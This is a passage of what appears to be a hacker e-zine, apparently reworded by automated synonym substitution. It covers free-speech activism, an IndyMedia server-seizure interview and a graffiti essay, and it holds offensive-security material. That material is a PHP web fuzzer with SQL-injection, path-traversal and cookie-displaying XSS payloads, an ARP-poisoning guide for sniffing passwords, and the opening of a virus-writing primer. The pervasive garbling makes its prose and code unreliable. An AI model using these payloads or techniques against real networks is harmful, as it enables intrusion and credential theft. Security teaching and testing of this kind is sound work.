desires of Jefferson, Washington, Mill, Madison, DeToqueville, and Brandeis. These desires should now be born anew in us. You might be afraid of your individual kids, since they're natives in a world the place you'll at all times be immigrants. Since you concern them, you entrust your bureaucracies with the parental tasks you're too cowardly to confront yourselves. In our world, all the emotions and expressions of humanity, from the debasing to the angelic, are components of a seamless entire, the world dialog of bits. We can not separate the air that chokes from the air upon which wings beat. In China, Germany, France, Russia, Singapore, Italy and america, you try to beat back the virus of liberty by erecting guard posts on the frontiers of Our on-line world. These might preserve out the contagion for a small time, however they won't work in a world that may quickly be blanketed in bit-bearing media. Your more and more out of date info industries would perpetuate themselves by proposing legal guidelines, in America and elsewhere, that declare to personal speech itself all through the world. These legal guidelines would declare concepts to be one other industrial product, no extra noble than pig iron. In our world, regardless of the human thoughts might create may be reproduced and distributed infinitely for free of charge. The worldwide conveyance of thought now not requires your factories to perform. These more and more hostile and colonial measures place us in the identical place as these earlier lovers of freedom and self-determination who needed to reject the authorities of distant, uninformed powers. We should declare our digital selves proof against your sovereignty, whilst we proceed to consent to your rule over our our bodies. We are going to unfold ourselves throughout the Planet in order that nobody can arrest our ideas. We are going to create a civilization of the Thoughts in Our on-line world. Could or not it's extra humane and honest than the world your governments have made earlier than. John Perry Barlow, Cognitive Dissident Co-Founder, Digital Frontier Basis Davos, Switzerland February 8, 1996 [------------------------------------------------------------------------------] [ uk indymedia interview: hackers defending open publishing systems .......... ] [------------------------------------------------------------------------------] Activists from HackThisSite.org at down with one of many UK IndyMedia system directors on the latest DEFCON hacker conference. We interviewed him relating to the server seizures, how hackers can work to guard open publishing methods resembling IndyMedia, and the way hackers have gotten extra radicalized and concerned with social justice struggles. This interview is being streamed as half of the brand new web site http://www.Hacktivist.web. Hearken to the interview by way of MP3: http://www.hacktivist.web/radio/ukindymedia.mp3 Jeremy: That is Jeremy from HackThisSite.org and I am sitting within the room with a number of people who find themselves loosely affiliated with our web site in addition to somebody who's on the UK IndyMedia undertaking. We have now just a few issues we might like to speak about like the best way to defend open publishing methods resembling IndyMedia, the best way to configure our servers in such a manner that makes us much less liable, and the way hackers can play a extra integral position in defending open publishing methods. Different individuals are going to introduce themselves proper now: UK: Hey that is ..... from the UK and I am from UK IndyMedia Alx: That is Alxciada from HTS Gary: That is Gary Naham, an activist in Chicago hoping to turning into a hacktivist devoted to seeing authorities methods that survive and respect the digital evolution of know-how and never intrude Jeremy: We have now just a few issues we might like to speak about particularly about how hackers can play a extra integral position and assist work with varied media collectives, however we might additionally like afterwards speak basically about IndyMedia, free speech, open publishing methods, p2p file sharing methods, and the way hackers can work along with folks to assist strain and alter the regulation. For starters, why do not you inform us a little bit bit about your self, what kind of work you do, what teams you're employed with previously, the way you assist out? UK: A little bit about myself, properly, by day an IT techie, by evening an IT director I run public web, public web is likely one of the internet hosting factors indymedia uk, the wiki server, and I kinda acquired concerned when the server seizure occurred about 9-12 months in the past, kinda turned fairly vital to me that we introduced em up as rapidly as potential as a result of the time we're down, we lose the possibility to inform our facet of the story so I put up considered one of our servers put a mirror off the publishing website and we went from there. Jeremy: Nice. So proper now you are at the moment working as IT director to assist out with configuring and establishing these servers once they go down? UK: Yeah that is proper, let me rapidly go over all of the issues I am concerned with. Primarily I run a server mirroring the UK website. Moreover I arrange rackspace for among the different indymedia tasks which are at the moment happening. Present in the method of attempting to safety information with what is going on on on the planet. Jeremy: I perceive that it is vitally imprecise about what the feds had been wanting for on these servers and there is some extent of confusion. Are you able to inform us any particulars about what kind of information or proof they have been in search of and the way they executed the search? UK: From my understanding it wasn't really the feds who have been after the server. My understanding is that it was a results of strain by the Swiss and Italian authorities regarding earlier protests in Genoa and Niece, I consider these have been the 2 areas of pursuits. I consider photographs have been revealed which ... authorities did not like, and yeah, they have been in search of server logs, they have been in search of IPs, now thankfully, our server does not log IPs! [Great! What a shame! Too bad!] Jeremy: I heard the images that have been posted have been undercover police they usually have been in search of the individuals who initially revealed them? UK: That is the Swiss connection I consider, nonetheless I believe the Italian authorities had a extra basic downside with IndyMedia - I met with the home I marvel if that is what that connection got here from. Jeremy: How might the Italian authorities strain the British authorities to execute this raid? UK: As I perceive it, there is a mutual authorized help treaty with Italy and the US. Now Rackspace which beforehand hosted the UK server is a US firm which subsequently falls underneath US jurisdiction to a level. Query not totally authorized as a result of the servers have been hosted within the UK and rackspace has a authorized entity within the UK, subsequently, we consider it ought to have gone via due course of within the UK who ought to have taken the servers - they did not, that is what the road is at the second. Jeremy: The internet hosting firm itself gave the server up upon request by western authorities? UK: I consider so, now this is likely one of the fascinating issues, and this ties again with the place we're at this time. Apparently, the servers weren't really requested, the logs have been requested, and Rackspace went one step additional. Rackspace successfully bent over and took it. They handed over the whole server system. Jeremy: Wow. Alxciada: In order that they have been initially coming for the logs. UK: Apparently so, that is what we're listening to, hopefully within the subsequent few days we ought to hear a little bit extra about it. The EFF put sufficient strain on the US facet to get the papers. Alxciada: Was it United States federal brokers that raided the server? UK: I consider so. I consider it was Rackspace workers that went in took the servers. The courtroom orders that have been filed have been filed in Texas. The EFF principally went via that and demanded the papers, and that is at the moment being sorted out, however hopefully we'll get a transparent image of what they have been after. Gary: Are there any areas of European or British safety regulation that gives protection or at the very least an choice of defending in opposition to this? UK: Oh, sure! Information safety acts alone ought to cowl this type of subject as a result of they successfully seized a server that hosted shitloads of various stuff. They have been after one very particular piece of data and within the course of gathering a number of different shit so I think about there are information safety acts which have bearing on the case. Gary: Are there authorized cures obtainable to prosecute and have an effect on authorities if that is an extrajudicial motion which is what it appears like. UK: I am unsure if something is going on within the UK as a result of sadly the UK Europedoesn't have something an EFF at this stage. It is one of many issues that is being labored on talked about nevertheless it's by no means achieved fruition. Due to this fact we're relying on a far wider group of people to assist us out. folks related to journalism, commerce, privateness, and many others. however there is not any central group for info privateness having to do with digital Gary: So European Information Safety legal guidelines are even much less protecting than US safety? UK: I believe they're as a result of it was the way in which the manuveur was pulled. We successfully by no means moist via anyplace nearthe UK system. If it went via the UK system it will be an extended drawn out case there would have been professionals and cons we'd have had our day in courtroom. However as a result of they went via a backdoor in the US system - a loophole - it went previous our safety. Gary: That the British have been completely satisfied to permit? UK: I do not assume the Brits had an entire lot to do with it. From our understanding Rackspace workers went into the server room yanked the servers. Jeremy: They have been initially have been in search of a flat log file and the corporate simply mentioned "I am not gonna mess with this!" and gave up the whole server? UK: As I perceive it, sure Jeremy: And there have been a variety of different varied web sites and collectives on the server? UK: Oh sure, there was every thing from linux distros, to numerous indymedias, private websites - yeah, it hit so much. Gary: I might assume it is a violation Rackspace's contract with IndyMedia entities which have signed it? UK: Sadly the contract was with a single particular person. Sure, there most likely was a contract violation there, however as I mentioned, as a result of it by no means touched UK authorities, to tug it via the UK system there could be no level of - the case would disintegrate. As a result of it was within the US the case there was a precise case within the US happening, there's a lot simpler to give attention to. Jeremy: Realizing what now concerning the company host and the way they have been so fast to surrender every thing and set again these varied collectives, how would you configure or construction these servers to make the system as an entire much less liable? UK: Properly it is very fascinating and truly quite simple. We drew an amazing huge circle across the greatest weak point: we had one server, we now have twelve. [laughter] UK: The content material administration system we use is excellent, it is designed for mirroring. We have principally taken advatage of the way in which the CMS system was designed and used it to our benefit. The dynamics are the location are literally finished from the publish server after which the servers really present the information. Jeremy: So whenever you really publish one thing to UK IndyMedia it's really mirrored to different servers everywhere in the world? UK: And a wide range of totally different working methods. Our private server w3.org is a Solaris field. Others run debian, freebsd, fedora core - we've a pleasant contingent of OSs so if a vulnerability breaks out - until it is somethig inside the publishing system itself - we must always have an inexpensive quantity of resiliance. Jeremy: This looks as if an ideal instance of how a decentralized mannequin of content material distribution can defend ourselves from not solely authorized subpoenas as a result of it creates a aura of paperwork the courts must undergo however defend ourselves from would-be hackers ... UK: Sure, positively. Gary: In an period of extrajudition proceedings the place the authorities assume they can do something they need and simply current us with details regardless of authorized protections that clearly exist on this case and have been violated, I believe you might have to make use of know-how to negate the truth that authorities assume they're above the regulation. UK: Exactly, it isn't the primary case and it isn't the final. There's issues occurring for the time being, servers taken on a regular basis, it is a rising downside, indymedia wants to pay attention to that and attempt to survive it. Jeremy: How are folks inside hacking and programming communities stepped as much as help the undertaking? UK: Within the final 3-4 months we began to place collectively as safety staff to go via every of the servers, every of the code bases, and work for them search for the weaknesses. I believe traditionally IndyMedia has been fairly lax about that, extra with folks having the ability to publish freely and never fairly a lot concerning the safety of their methods through which the puiblising happens, That is altering, in a short time. Jeremy: That brings me again to a few months in the past - there had been two main vulnerabilities - one occurred throughout the RNC with the cross website scripting error in dadaIMC - a gaggle calling itself RightWingExtremist.web made use of this throughout the RNC by altering many indymedia websites to redirect to a website that mentioned 'indymedia is anti-american' or one thing loopy! [killing communists!] UK: The system we're utilizing within the UK may be very resiliant, it is java written, the man's finished an excellent job we have not seen too many issues Jeremy: Which one are you utilizing? UK: We're utilizing Mir, it has been fairly responsive. Jeremy: I consider DadaIMC had had essentially the most issues .. UK: Yeah, Dada has had a transparent historical past of issues, I agree Jeremy: A couple of months in the past I had spoken to Spud relating to a vulnerability I found DadaIMC relating to importing and excecuting PHP information. We privately notified them of this vulnerability and mentioned, "pay attention we have to preserve this quiet till every impartial IMC employees is privatley notified and replace it. In fact it is a huge job and it isn't one thing that'll occur in a single day! UK: One factor I'll say whereas I've acquired the chance is that there's a non-public listing for IMC techies. It is a pretty rigorous course of to get in there, but when anybody finds a difficulty, dump it straight to the individuals who can take care of it [email protected] is the place to dump in. The technies in there have an online of belief the place you may't get in until two different folks vouch for you. Jeremy: How do you assume right-wing hackers and script kiddies have made use of the open disclosure coverage of dadaimc? UK: I am unable to actually speak a lot about that sadly it isn't one thing I've been concerned with. Actually folks we're working with are going via dadaimc line by line. Jeremy: How can hackers play a extra integral position within the growth and safety of this software program? UK: I believe the trick is de facto simply to become involved. To get to the purpose of the place you are a member of the trusted staff takes a little bit bit of labor, however there's nothing to cease folks.. Jeremy: Yeah, trigger they'll nonetheless simply obtain the supply and simply begin auditing. UK: Yeah, however one factor we do not need occurring this has occurred as soon as already . We had a man portscanned all 13 of the UK mirrors. Now in a way he discovered issues we knew about, however alternatively we do not wish to encourage folks to begin scanning our bins as a result of it generates additional processes - we might be far happier for folks to work with us and talk with us about what they're doing this knd of thing- if something so we do not block them. Jeremy: I had personally put in it on localhost. How can hackers and civil rights activists collaborate and work collectively with a view to assist strain the regulation and assist take the battle to the courts? UK: I believe the largest factor is to get hackers to grasp the problems. Hackers on the finish of the day do not break issues. It does not take a lot to see the political ramifactions of their actions. The one time you actually assume speak it as a neighborhood is when - the cisco case, one thing occurs, one thing get pulled, somebody shits of their pants, however no person takes the curiosity over an extended time period foundation. That is irritating and it wants to alter. What the Hack one other con in Europe proper now, their speak listing is much more encompassing, they spend some time with different points than safety per say, just like the DMCA, counter-terrorism, they assume behind the field, and as a hacker neighborhood, all of us want to try this. Jeremy: I would definitely agree of your critique, particularly of DEFCON, this appears extra like a white hat drunken social gathering, there's not as a lot educating right here, solely 10% of the folks listed here are perhaps hackers anyway, everybody else got here right here for the tradition, the sideshow. How do you assume issues have modified over the previous few years in gentle of among the new insurance policies and anti-terrorism laws? How do you assume the hacking neighborhood has modified, develop into extra radicalized? UK: I believe the UK and Europe is actually beginning to decide up this. Nonetheless, not like America the place you might have an enormous nice neighborhood, Europe does not have that, that is one of many issues that's being labored on proper now, just like the European structure, declaration of human rights, that type of factor. We have to concerned. The folks within the floor must get it finished and push it. We have had a lot of success lately and we have to study from it.. If European hackers can bond collectively, we are able to cease dangerous laws, however we have to pull collectively. All too regularly this hasn't occurred. Jeremy: I am taking a look at previous conventions like Hackers on Planet Earth that occurred final summer season. It was held in New York Metropolis a month earlier than the Republican Nationwide Conference, so naturally it was much more politically charged. I thought it was much more impartial, extra real, speaking about hacker rights and digital rights and the way we are able to defend methods resembling IndyMedia - I consider they really had an IndyMedia speech and several other different political speeches... UK: What the Hack was the identical manner. Italian authorities brokers went in and sniffed the wire successfully and the ISP advised IndyMedia it was an influence outage. However yeah, it is certain to occur. Alxciada: How way back have been your servers really taken? UK: Attempting to assume, I consider it was final June Jeremy: What do you concentrate on the raid that occurred a couple of month in the past in Bristol? UK: That is even worse and that is a type of issues which are an actual subject. Indymedia wants to maneuver towards encryption circuits and publishing stuff so that you cannot tie again to who exactly posted what. The Italian case - my consciousness that's they did not notice how content material is distributed. Jeremy: What have been the circumstances behind the Bristol server being seized? Had been additionally they in search of server logs? UK: Yeah, that was a case the place a radical collective did some direct motion destroyed some property and police turned concerned. My understanding is that somebody from IndyMedia tipped off the police. Jeremy: In order that they broke concensus with the bigger group, went on to the police, and that brought about the server as an entire to be seized? UK: Yeah, and that was hosted in somebody's home as properly, in order that they got here into their place. Alxciada: Did they've any mirrors? UK: They'd one other backup nevertheless it wasn't actively up to date. It is extremely tough to come up with somebody with the Bristol undertaking. The server was in Texas and it's tough to really swap over the backups. Jeremy: The seizure in Bristol occurred a couple of week earlier than the G8 demonstrations? UK: Yeah, Bristol is pretty seperate collective of the UK, they usually hadn't realized the teachings UK IndyMedia have, which is a disgrace. Jeremy: What do you need to say to people who find themselves simply starting to get concerned, simply beginning to perceive these points. What could be essentially the most efficient approach to educating themselves in addition to plugging in with varied collectives and people who find themselves concerned to take a extra lively position? UK: The largest factor is to simply sit down and begin studying IndyMedia, working out how IndyMedia capabilities, how the worldwide teams resolve issues successfully. Then come discover us - we're there! Jeremy: Nice! I assumed this was very productive. The rest you'd wish to say? Gary: I would wish to say one factor. Thank YOU for placing your self and your property in danger for the free change of digital info as a result of your a hero and also you're placing every thing on the road - there's nothing to say that they will not be busting down your door subsequent. So I love you for it and extra energy to you. It takes 100 heros such as you to maintain this motion alive. UK: There are numerous of us - in locations folks would not anticipate finding us both! [------------------------------------------------------------------------------] [ misadventures of irish hackers ........................................... C ] [------------------------------------------------------------------------------] On the first ever Northern Eire Pc Safety Fanatic Conference (NICSE CON) held within the Europa Resort Belfast noticed the amalgamation of 87 hackers, 14 Pc Science Professors, 19 System Directors, and 4 Police Officers, All with the frequent purpose to hunt and study new safety Data. The Con held many actions resembling Seize The Flag ( Fedora Programs Used) Hack the Resort ( A profitable bid to take over the Resorts Inner IT system) The Hammond Information ( An in-depth Dialogue into his scenario) Hackthissite Ð ( Dialogue into Origins, success's , Failures ) Shows on Bluetooth Hacking Shows on the Northern Eire Hackers ( Progress, Abilities ) All in all it was a incredible day, nonetheless as most of you DNScon and DEFCON goers know, the actual stuff does not occur till the con is over and other people begin to speak. As I used to be one of many organisers, I used to be getting lots of people coming as much as me speaking about various things. Nonetheless one man particularly caught my consideration; he mentioned he was a Police Officer working within the Pc Sides of issues Ð Forensics, Stings and many others. So I instantly provided him to come back be part of the different organisers and myself for the standard post-con pint of Guinness. As traditional the subject of Politics got here up, and clearly his views have been greater than fascinating as a result of his occupation. Progressively we turned the dialog round to the IRA (Military sworn to maintain Eire Free from British Troopers and to create a united Eire). The officer began to speak about his involvement in sure operations in opposition to the IRA (Strictly of the Document of Course:-P). One of many operations he solely heard about was the tapping of the Sinn Fein Workplace (Sinn Fein the political Wing of the IRA). When Sinn Fein left their workplaces at evening, the Particular Brokers would break into the workplaces and plant tiny little bugging gadgets so they may hear the Sinn Fein Leaders converse. Not solely was this not authorised but in addition HIGHLY unlawful. (image) That is a part of a British MI5/PSNI bugging system discovered hidden within the floorboards of a Sinn Fein workplace in Belfast in September 2004. Approx 10.5 inches by 6.5 inches. (At this level I'll inform you that this officer was completely in opposition to all of this criminal activity from the police, and he knew his penalties of telling us this info. Nonetheless causes not identified to us, he advised us every thing. For this, we thanks) The officer additionally acquired us interested in the present case that he was engaged on at the time. Operation ÒMirrorÓ Ð This operation referred to as for the officer and a staff of pc Specialists inside the pressure to implant Key logging Software program onto IRA suspects in addition to Sinn Fein Politicians. This software program was implanted by a number of strategies. By discovering computer systems that the Suspects used and truly loading the software program onto the pc in entrance of them, or the lower than authorized manner of inserting this software program onto the Suspects and Politicians pc remotely ( i.e. HACKING). The officer advised us, that none of this was authorized, and none of this was given permission from the Chief Constable. Nonetheless the staff have been advised to maintain this a secret. One other fascinating level was that the information obtained from the suspects was used to Black Mail the suspects. In addition they discovered Credit score Card numbers and ran unlawful checks on their purchases. This says so much concerning the Northern Eire Police Service. That they might be as low as to carry out unlawful acts with a view to Blackmail and incriminate harmless folks. Nonetheless this is not simply an remoted case in Northern Eire, its all over the world. [------------------------------------------------------------------------------] [ graffiti and counter-culture ........................ the wooster collective ] [------------------------------------------------------------------------------] The graffiti motion is by its very nature a counter-culture, anti-establishment mindset that's an alternative choice to the mainstream. It's a rejection of the established order. If you resolve that you're going to go up in opposition to the institution, usually all you might have is your self. The one manner you may survive is to guard your self. If you do not defend your self, you die. If not actually, then spiritually. As a result of you have no assets given to you by the mainstream institution that you just rejected, the one manner you may surviive and defend your self. The best way you do that is to develop your individual private ethical code that permits you to survive in a world that's exterior "the norm" It's this code that drives you. Not cash. Not a home with a white picket fence. Solely your beliefs. The code is what offers you piece of thoughts when issues get powerful. It is what permits you to go to jail in your actions after which get proper again on the market to stand up as soon as once more. It is the code that stops you from going loopy. So the place do you develop this code? You develop it on the streets. You study it from watching and speaking to others. However most significantly, you get it from experiencing life. And that is why graf tradition is so highly effective to individuals who do it. You get to expertise life to the fullest. You might be really alive, risking what you might have, rejecting the institution, however dwelling your life the way in which you might have outlined it. You may have actual, true freedom. As you expertise life on the road you start to select up experiences like they have been little scraps of paper. And also you begin to make a collage with the experiences. You set the entire scraps collectively and it turns into your individual private cloth that defines who you're. You might be outlined by actuality, not by tv. You might be outlined by expertise, not by aspiration. It is your code and no person elses. And no person can take it away from you. And now, immediately, you might have a weapon. The code itself turns into your weapon. Your life is on the road. And there is an order to it. You understand the place issues are supposed to be. Issues are the place they need to belong. Adverts go on billboards. Graffiti goes on partitions and doorways. The 2 co-exist. They conflict, however they know the place they every must be. If you happen to're dwelling the lifetime of a real graffiti artist, you are livin' by the code you might have created for your self. And what this implies is... Graffiti should not be in advertisements and advertisements should not be in graffiti. Graffiti in an advert is an advert. It is not graffiti. Graffiti finished legally is public artwork sanctioned by the institution. It is not graffiti. For graffiti to be graffiti, it needs to be finished illegally. Interval. !!!!!!!!!!!!!!!! !!! SKILLS !!! !!!!!!!!!!!!!!!! [ -----------------------------------------------------------------------------] [ writing a php fuzzer to self-discover web vulnerabilities .................. ] [ -----------------------------------------------------------------------------] Fuzzers are instruments which might audit code and probe methods for generic vulnerabilities. For the aim of this text, we'll write a number of capabilities for a PHP script which is able to fuzz the GET parameters of a URL to set off error codes and uncover potential vulnerabilities. We are going to then discover prospects of increasing the performance to develop into a broader all-emcompassing net vulnerability auditing device. Our net fuzzer works by taking a URL and manipulating every GET variable to make each potential mixture of requests with an array of malicious characters designed to generate errors. Take into account the next array which accommodates a big choice of frequent requests which frequently generate errors and will open scripts as much as safety holes. // malicious net requests $vulnchars[0] = array("%00","%2527percent252esasdf","%u0000", "%u5c00percentu2700","/","../","./..././","/%2e/", "%2e","%5C","%s", "'","'''''",""", "%%%%%%","!!!!!!!!!!!!!!!!!!","#", "%5C27","%%5Cpercent56" , "'", "",';',";a", "|", "?>", "%a0"); // malicious sql requests $vulnchars[1] = array(" OR 1=1", "' OR '!'='!"); // malicious xss requests $vulnchars[2] = array("javascript:alert(String.fromCharCode(65,66,67))", "<script>alert('cookies, yo: ' + doc.cookie);</script>"); We might then make all potential combos of net requests and analyze the output. Scan the outcomes for an array of frequent error code output and generate a listing of 'flagged' URLs to be later reviewed for auditing functions. We have now put collectively the next array which accommodates a listing of frequent net, sql, and xss errors. $flags[0] = array("<b>warning</b>:", "warning:", "<b>deadly error</b>", "failed to open stream:", "inner server error", "there was an error when processing this directive.", "http/1.1 400", "http/1.1 403", "http/1.1 500", "gateway error", "command not discovered", "file not discovered"); $flags[1] = array("[obdc", "mysql error", "you have an error in your sql syntax", "odbc drivers error", "[microsoft sql", ); $flags[2] = array("javascript:alert(string.fromcharcode(65,66,67))", "<script>alert('cookies, yo: ' + doc.cookie);</script>"); Now that we all know what sort of requests to make and what we must be parsing the output for, we are able to write some PHP code which is able to question the HTTP server for our requests. On this instance, we're solely making GET requests, however it may be simply modified ti embrace different HTTP strategies. operate MakeRequest($url, $technique="GET") $url = str_replace(" ", "%20", $url); if ($technique=="GET") $host = substr($url, strpos($url, "://") + 3);$host=substr($host, 0,strpos($host, "/")); $request = substr($url, strpos($host, "/")); $fp = @fsockopen($host, 80, $errno, $errstr, 10); if (!$fp) echo " ERROR . $url $errstr ($errno)$newline"; else $out = "GET $request HTTP/1.1rn"; $out .= "Host: $hostrn"; $out .= "Connection: Closernrn"; fwrite($fp, $out); whereas (!feof($fp)) $buf.= fgets($fp); fclose($fp); return $buf; Now that we are able to get outcomes from the HTTP server for our malicious requests, we must run it via a operate to scan it for the error codes listed above. The next operate returns true if the $end result has any matches from the $flags array. operate TestResult ($end result) world $flags; $end result = strtolower($end result); for ($i=0;$i < depend($flags);$i++) for ($o=0;$o < depend($flags);$o++) if (!(strpos($end result, $flags[$i][$o]) === false)) return 1; return 0; Having all of the items we'd like, it is time to write some code to tie every thing collectively. The next code makes use of the array $lists to include all URLs to probe. It first parses the URL for all GET parameters to fuzz and begins a loop to check all potential combos of distinctive URLs. It goes via every GET variable and tries every malicious character whereas utilizing the default worth of all different GET parameters. The overall variety of requests must be round N ^ N for every url in $listing the place N is the variety of GET parameters in every URL). It then MakesRequest for every distinctive URL and passes the outcomes off to TestResult, asserting if a match in opposition to one of many error codes from $flag. for ($inc=0;$inc<depend($listing);$inc++) { if ($localonly == true AND (substr($listing[$inc], 0, 17) != "http://localhost/" AND substr($listing[$inc], 0, 17) != "http://127.0.0.1/")) die("Sorry, this script can solely be examined in opposition to localhost."); // SetUpParameters parses and shops every GET paramater from a URL into the array $get and $getvalues $url = SetUpParameters($listing[$inc]); if (trim($url) != "") { echo "$newline$url$newline"; // undergo every type of vulnerability we're testing for ($vulni=0;$vulni<depend($vulnchars);$vulni++) swap ($vulni) case 0: echo " * Basic net vulnerabilities$newline"; break; case 1: echo " * SQL vulnerabilities$newline"; break; case 2: echo " * XSS vulnerabilities$newline"; break; // undergo every GET parameter within the URL for ($o=0;$o < depend($get);$o++) for ($i=0;$i<depend($vulnchars[$vulni]);$i++) // generate url from listing of susceptible characters $whichparam = $get[$o]; $testing = $url . "?"; // put collectively the default values for all the opposite parameters in the script for ($z=0;$z<depend($get);$z++) if ($get[$z] != $whichparam) $testing.="&".$get[$z]."=".$getvalue[$z]; $testing .= "&" . $whichparam . "=" . $vulnchars[$vulni][$i]; $enjoyable = MakeRequest($testing); if ($parseforlinks == true) ParseForLinks($enjoyable); $error = TestResult($enjoyable); if ($error != 0) echo " FLAG! .. $testing$newline"; if ($error == 0 and $verbose == true) echo " OK .. $testing $newline"; } } This code is the naked necessities to writing an online GET request fuzzer. There are a great deal of options which might develop this script to be a extra encompassing net auditing device. For starters, the script may be written to learn the output of a URL and spider it for added URLs in <a href="http://$host/"> tags to be added to the $listing array. It will also be expanded to incorporate different strategies together with POST, SSL, cookies, and file add vulnerabilities. Writing an online fuzzer is a rewarding programming train the place the probabilities are countless. [----------------------------------------------------------------------------- ] [ arp poisoning ................................................. by darkangel ] [----------------------------------------------------------------------------- ] Introduction This text is supposed to show how ARP works and the way one can go about poisoning the ARP cache and allow them to utterly sniff site visitors over a switched community. This text assumes that you have already got entry to a switched community. ARP Poisoning is a manner of tricking computer systems over a switched community to ship site visitors via you earlier than going to different computer systems or out to the web. Tackle Decision Protocol(ARP) ARP is a dynamic protocol to map a 32bit IP Tackle to a 48bit bodily {hardware} deal with (MAC Tackle). If one system over a community needs to speak with one other system over a community, it can first examine if it already is aware of that methods MAC Tackle and if not it can ship out an ARP broadcast which is able to look for the {hardware} deal with of the vacation spot system. There are 4 forms of ARP messages however the principle two are ARP Request and ARP Reply. When a system begins broadcasting an ARP Message it sends out an ARP Request. An ARP Request is a message despatched to the printed deal with, the message accommodates the sender's IP Tackle and MAC Tackle and requests the MAC Tackle of the given IP, after which it waits for an ARP Reply. An ARP Reply replies to the ARP Request and tells the pc sending the ARP Request what its MAC Tackle is. The ARP Cache is a brief storage place that holds a desk with MAC Tackle's and IP Tackle's. If a pc needs to speak to a different pc and it does not have already got its MAC deal with saved it can ship an ARP Request. If the Pc that's sending the ARP Reply doesn't have the requesting computer systems MAC Tackle it as properly will put it aside to cache. So now each computer systems have the MAC Tackle. A system can not talk with one other till it has its MAC Tackle. ARP is a stateless protocol with no authentication in-built so any ARP Reply, whether or not there was a request or not will replace the ARP Cache on a pc. All methods will settle for an ARP Reply regardless if there was an ARP Request despatched. The Change Media Entry Management (MAC) is a regular addressing system for all Ethernet gadgets. Most networks use switching gadgets and in a switched community packets are solely despatched to the port they're destined to in keeping with their vacation spot MAC Tackle. Switches preserve a desk that associates MAC Tackle's with sure ports. A swap constructs a route desk by extracting the supply MAC Tackle from the Ethernet body of every packet processed. If any entry within the route desk doesn't exist the swap will ahead the packet out all of its ports. Inside a switched community packets are solely despatched to the vacation spot system making it, so different gadgets can not see the site visitors. Poisoning There are just a few methods to manipulating a community to ship site visitors via you earlier than sending it to the packets to the vacation spot system. Considered one of these strategies is known as ARP Poisoning and it's whenever you ship a custom-made ARP Reply to totally different computer systems throughout the community tricking their computer systems into updating their ARP cache with new MAC Tackle's (Your MAC Tackle). So now every time computer1 needs to ship a message to computer2 it will get the MAC deal with of computer2's IP and sends the message to that MAC deal with. But when that MAC deal with is modified to your MAC deal with, by poisoning the ARP Cache the message might be despatched to you as an alternative. After packets are despatched to you, you have to ahead the packets to the pc it was meant to go within the first place or DoS might be brought about and the hosts won't be able to speak anymore. One other issue that you have to weigh in are timeouts, if there is no such thing as a site visitors over the community, after a timeout interval the ARP cache of the computer systems throughout a community might be flushed out and you'll need to ship one other constructed ARP reply to the hosts in order that site visitors is as soon as once more forwarded to you. One approach to repair that is to robotically ship ARP Replies each 10 seconds or so to the hosts that you really want to poison. Sniffing Sniffing is the act of capturing packets that are not essentially meant for public viewings. If you sniff packets throughout a community you may come throughout many fascinating issues resembling emails, on the spot messages, and even passwords to e mail accounts and ftp accounts and lots of different forms of passwords which in my expertise are most of the time, left unencrypted. There are numerous instruments out there that may robotically scan packets for username and password data. You can even see what web sites the individual goes to. Wi-fi If an entry level is related on to a hub or a swap than it leaves the complete wi-fi community open to ARP Poisoning. Wi-fi web is turning into increasingly more used and it's laborious to be anyplace that doesn't have a wi-fi entry level, particularly in properly populated areas. This leaves an enormous safety danger to most networks as a result of in principle somebody with a laptop computer might go into the foyer of a enterprise and get on their community by cracking their WEP key or simply merely connecting if they do not even have WEP. The attacker would then simply want to poison the ARP Cache of the totally different computer systems throughout the community after which ahead all site visitors via you. You'd get their passwords and usernames, the web sites they go to and the rest that you just really feel could be enjoyable to have a look at. Instruments Ettercap http://www.ettercap.sourceforge.web Permits you to sniff networks and poison the arp and auto redirect site visitors TCP Dump http://www.tcpdump.org/ A basic objective packet sniffer Cain&In a position http://www.oxid.it/cain.html Permits you to sniff networks and poison the arp and redirect site visitors. Doesn't work over wi-fi and is just for home windows. However may be very usefull for cracking passwords that you just come throughout ARPoison http://arpoison.sourceforge.web/ Command line device for UNIX which sends out spoofed packets Nemesis http://nemesis.sourceforge.web/ An excellent packet injection device Dsniff, Arp Redirect http://naughty.monkey.org/~dugsong/dsniff/ Will allow you to intercept packets and get passwords and redirect the site visitors, very good device [------------------------------------------------------------------------------] [ ars viralis : the viral art .................................. by nomenumbra ] [------------------------------------------------------------------------------] 0) Introduction 0->1) What's a virus? 0->2) Kinds of malware? 1) Summary ideas 1->1) Survival Idea 1->2) Survival Concept 2) Code Apply 2->1) Easy Exe Virii 2->2) Batch Virii 2->3) Script Virii 2->4) Reasonable ExeVirii/Worms 2->5) Idea Virii Foreword. "And God blessed them, saying, Be fruitful, and multiply, and fill the waters in the seas, and let fowl multiply within the earth." From the start of mankind's existence, they have been fascinated with creating life, one other creature, with a "thoughts" of it is personal, a creature that may flip itself in opposition to it is grasp. I believe this is likely one of the important the reason why the VX scene exists. Most viruswriters (together with me) benefit from the challange of making a small life kind that "lives" on it is personal. 0) Introduction Properly, sufficient preaching for at this time. Earlier than I begin with technical explainations, I will first make just a few issues clear to the actually,actually new folks on the market. 0->1) What's a virus? Properly, a greater query could be, what's malware? As this umbrellaterm covers rather more than simply virii. Malware is the frequent time period for any undesirable program in your field. It may be divided in a number of catogories: I) Virii. Most individuals assume virii and malware are the identical, however that could be a frequent misassumption. A virus is (in my view) finest outlined as: "A self-replicating program that abuses different (host) applications with a view to unfold". A virus at all times wants a number program, it can not unfold on it is personal, it wants different applications to infect. II) Worms. The primary distinction between a worm and a virus are the way in which of replication, a worm can dwell with out a host, it is like a micro organism, it copies itself and propagates itself trough many alternative methods. Not like a virus, most worms will not infect different applications. III) Trojans. These sneaky little devils derive their identify from the traditional greek fantasy of the wood horse of Troje (, with Odysseus inventing a trick to get into the metropolis and arising with this enormous wood horse which accommodates the greek troopers). Properly, at this time's trojan horses are very like that, they pose like an harmless or (extra usually) a really engaging file, however they really include a harmful payload, both they're disguised worms, virii, adware, logic bombs, or RAT's (Distant Administration Instruments). IV) Adware. These are the brand new gamers in at this time's cyber-battlefields. Adware is a time period for any piece of software program that displays the sufferer's habits, from browsing habits to chat passwords, to banking passwords to full scale company espionage. V) Logic Bombs. Fairly uncommon, Logic Bombs are applications that triger when a sure occasion occurs (or does not occur). When you find yourself the sufferer of a logic bomb, that somebody is de facto after you, as a result of they do not unfold within the wild. Logic bombs are generally created by disgruntled programmers who did not obtain their fee, or are afraid they will not obtain it. A logic bomb triggers when sure circumstances are met, like a date, or the deletion of a sure file. Think about a programmer works someplace, and he installs a LB that requires him to enter a password each month, else it can erase the whole field' harddrive. When the programmer will get fired, he cannot enter 